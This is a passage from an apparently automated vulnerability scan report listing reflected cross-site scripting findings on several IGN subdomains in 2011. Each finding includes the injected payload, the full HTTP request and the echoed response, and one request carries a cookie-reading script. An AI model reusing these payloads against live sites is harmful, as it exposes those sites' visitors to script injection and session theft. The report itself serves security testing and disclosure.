Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: 0dc60cc1f9e03db8d0908393da041b991653c74650a9da13
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; domain=.ign.com; expires=Wed, 09-Mar-2011 01:51:06 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3896


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
re=nl-NL&__ipculture=nl-NL";
var google_ad_type = "text";
var google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_max_num_ads = 4;
var google_ad_output = "js";
var __preferredculture = "nl-nle8d34";alert(1)//b1eedcf262";
var afcxml = "false";
var google_adtest = "off";
var google_ed = "";
var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_safe = "high";
var google_encoding = "utf8";
document.write(
...[SNIP]...

1.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c781b%3balert(1)//80b384a2d70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c781b;alert(1)//80b384a2d70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&c781b%3balert(1)//80b384a2d70=1 HTTP/1.1
Host: fimserve.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: b8847bfb2c7b896bf4dec7d1eb7325a2cc7709a8ba56094f
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326085558429262&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; domain=.ign.com; expires=Wed, 09-Mar-2011 01:02:35 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3806


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
ype = "text";
var google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_encoding = "utf8";
var google_ad_output = "js";
var afcxml = "false";
var google_adtest = "off";
var google_ed = "";
var c781b;alert(1)//80b384a2d70 = 1;
var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_safe = "high";
var google_max_num_ads = 4;
document.write('<script type="text/javascript" language="JavaScript" src="http://pa
...[SNIP]...

1.200. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /k/wns6kpl-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47353<script>alert(1)</script>ff7250afcdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000819
Content-Length: 68
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:02:35 GMT
Connection: close

Not Found: /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css

1.201. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /k/wns6kpl-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 791d8<script>alert(1)</script>1d99e800ce7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000773
Content-Length: 68
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:02:36 GMT
Connection: close

Not Found: /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7

1.202. http://fonts.ignimgs.com/wns6kpl.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /wns6kpl.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4490<script>alert(1)</script>adea6fcc8da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001293
Content-Length: 63
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:11:16 GMT
Connection: close

Not Found: /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da

1.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1146317p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77882"><script>alert(1)</script>eae0eba9c8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1146317p1.html?77882"><script>alert(1)</script>eae0eba9c8b=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-1188017689-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043485979v-1n-12mc+1297043485979mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1146317p1.html?77882"><script>alert(1)</script>eae0eba9c8b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1146317p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea3b2"-alert(1)-"4bf55089e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32463-1932835831-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487858v-1n-12mc+1297043487858mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934c.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd916"><script>alert(1)</script>af064e2c58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147934c.html?dd916"><script>alert(1)</script>af064e2c58b=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1500894823-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487464v-1n-12mc+1297043487464mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 83048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1147934c.html?dd916"><script>alert(1)</script>af064e2c58b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934c.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fd5c"-alert(1)-"ff30ee90d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-14395-551436527-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:29 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043489796v-1n-12mc+1297043489796mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 83820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92fe"-alert(1)-"f38442978de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-186224903-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487871v-1n-12mc+1297043487871mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf573"><script>alert(1)</script>6d05b099dbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147934p1.html?bf573"><script>alert(1)</script>6d05b099dbb=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19918-53826951-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043486037v-1n-12mc+1297043486037mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1147934p1.html?bf573"><script>alert(1)</script>6d05b099dbb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"77dfbb9df23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-1842023344-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:39 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043499536v-1n-12mc+1297043499536mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Ratings and Re
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eae1"><script>alert(1)</script>279a1848484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratings.html?3eae1"><script>alert(1)</script>279a1848484=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-335511075-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043496453v-1n-12mc+1297043496453mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 108099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Ratings and Re
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/ratings.html?3eae1"><script>alert(1)</script>279a1848484=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b863c"><script>alert(1)</script>fcd2abe112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b863c"><script>alert(1)</script>fcd2abe112b=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-855949556-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:34 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043494206v-1n-12mc+1297043494206mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Gear: Previews
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://gear.ign.com/?b863c"><script>alert(1)</script>fcd2abe112b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /

Issue detail

